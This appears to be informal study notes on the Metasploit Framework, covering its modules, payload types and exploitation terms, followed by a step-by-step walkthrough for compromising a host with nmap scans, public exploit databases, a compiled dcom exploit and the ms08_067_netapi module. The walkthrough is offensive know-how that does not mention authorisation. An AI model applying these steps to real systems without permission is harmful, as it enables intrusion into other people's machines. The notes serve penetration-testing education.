> Metasploit Framework is an open source project created by HD Moore in 2003 and acquired by Rapid7 LLC on October 21, 2009.
> It includes hundreds of exploits and payloads.
> It is considered one of the best penetration testing tools, with support for vulnerability assessment using Nessus and other famous tools.
> It is written in Ruby.
> Metasploit supports all platforms including Windows, Linux and Mac OS


Metasploit Framework interfaces
> MsfGUI
> Msfcli
> Msfweb
> Metasploit Pro
> Armitage

The library architecture in Metasploit is as follows:

> Rex: This is the basic library used in Metasploit for various protocols, transformations and socket handling. It supports SSL, SMB, HTTP, XOR, Base64, and random text.

> Msf::Core: This library defines the framework and provides the basic application interface for Metasploit.

> Msf::Base: This library provides a simplified and friendly application interface for the Metasploit Framework

*) cd /opt/metasploit/msf3 to enter the Metasploit framework directory -> ls

> The important directories listed are
data
external
tools
plugins
scripts

cd data/ => contains meterpreter, exploits, wordlists, templates and many more

cd meterpreter/ => .dll files (as well as other interesting things, which are typically required to enable the Meterpreter functionality called post exploitation)

> wordlists directory -> a directory inside the data directory. It contains lists of usernames and passwords for different services such as HTTP, Oracle, Postgres, VNC, SNMP and more.

> To update Metasploit -> msfupdate

Exploits

An exploit is a computer program that takes advantage of a particular vulnerability
> cd /opt/metasploit/msf3/modules/exploits -> ls -> cd windows (going into windows) -> ls
to view the code of any exploit we type -> cat <exploitname> -> cat ms08_067_netapi.rb

Auxiliary
Auxiliary modules are exploits without a payload.

> There are different types of auxiliary modules, such as
protocol scanners
network protocol fuzzers
port scanner modules
wireless
denial of service modules
server modules
administrative access exploits and so on.

**) ls -> cd ftp -> cat <module name> to see the module

Payloads
A payload is a piece of software that runs after a system is compromised. The payload is typically attached to and delivered with an exploit

*) 3 different types of payloads
> Singles
> Stagers
> Stages

Stages : Staged payloads use a tiny stager to fit into small exploitation spaces. During exploitation, an exploit developer has a very limited amount of memory to play with. The stager uses this space, and its job is to pull down the rest of the staged payload.
Stages are the type of payload that is downloaded and executed by the stager payload, such as Meterpreter, a VNC server and so on.

Singles : Singles are self-contained payloads for a specific task, such as creating a user, binding a shell, and so on.

Stagers : The stagers use the space and their job is to pull down the rest of the staged payload.
Stagers are payloads that make a connection between the attacker and the victim machine.
Example
If I want to inject a Meterpreter payload, we cannot fit the entire Meterpreter DLL into one payload, so the entire process is broken up into two parts. The first is the smaller payload, called the stager. After the stager is executed it makes a network connection between the attacker and the victim.
Over this network connection a larger payload is delivered to the victim machine, and this larger payload is known as the stage.


> Payloads are categorized according to OS, such as AIX, BSD, Windows, Linux and so on.

EXPLOITATION

Exploitation refers to the art of compromising a computer system. The basics of computer exploitation involve a deep understanding of vulnerabilities and payloads.
An exploit is a piece of well-written code, compiled and executed on a targeted system, which may compromise that system.

An exploit usually targets a known vulnerability, a flaw in a service or poorly written code.

BASIC TERMS OF EXPLOITATION

> Vulnerability : A vulnerability is a security hole in software or hardware which allows an attacker to compromise a system. A vulnerability can be as simple as a weak password or as complex as a Denial of Service attack

> Exploit : An exploit refers to a well-known security flaw or bug with which a hacker gains entry into a system. An exploit is the actual code with which an attacker takes advantage of a particular vulnerability.

> Payload : Once an exploit executes on the vulnerable system and the system has been compromised, the payload enables us to control the system. The payload is typically attached to the exploit and delivered with it.

> Shellcode : This is a set of instructions usually used as a payload when the exploitation occurs.

> Listener : A listener works as a component waiting for an incoming connection.


The biggest question: how does exploitation actually work?

Here's the SECRET FINALLY REVEALED

An attacker basically sends an exploit with an attached payload to the vulnerable system.
The exploit runs first and, if it succeeds, the actual code of the payload runs.
After the payload runs, the attacker gets fully privileged access to the vulnerable system, and then he may download data, upload malware, viruses, backdoors or whatever he wants.

How to compromise a system

Step 1 : Scan the IP address to find
                           open ports -> operating system -> services
Step 2 : Identify a vulnerable service and find an exploit in Metasploit for that particular service.

Step 3 : If the exploit is not available in Metasploit, go through Internet databases such as
>> www.securityfocus.com
>> www.exploitdb.com
>> www.1337day.com

Step 4 : After successfully finding an exploit

Step 5 : we launch the exploit and compromise the system.


Tools used

> Port scanners are Nmap (Network Mapper), Autoscan, Unicorn Scan and so on.

Syntax for nmap
  nmap -v -n <ip address>

-v -> verbose, to get verbose output
-n -> parameter to disable reverse DNS resolution

Syntax for an intense scan by nmap
  nmap -T4 -A -v <ip address>


After gathering information -> open msfconsole -> search dcom (it searches all of the Windows RPC related exploits in its database)

Searching for an exploit in Metasploit through the search command
syntax
search <service name>
Note : if the exploit is not available in Metasploit, then we have to search the Internet exploit databases for that particular exploit.

>> How to search for an exploit on these online services
open this website => www.1337day.com
  Search for exploits on the Windows RPC service
find the exploit and save it

Now we exploit the target machine

as we know, we scanned the IP address and found all the ports,
and we exploit one of those ports

launch the terminal -> type gcc <exploit name with path> -o <exploitname>
for example
gcc dcom.c -o dcom

./<filename>

use exploit/windows/smb/ms08_067_netapi (in msfconsole) and press enter

then show options
RHOST (remote host)

set RHOST <ip address>

exploit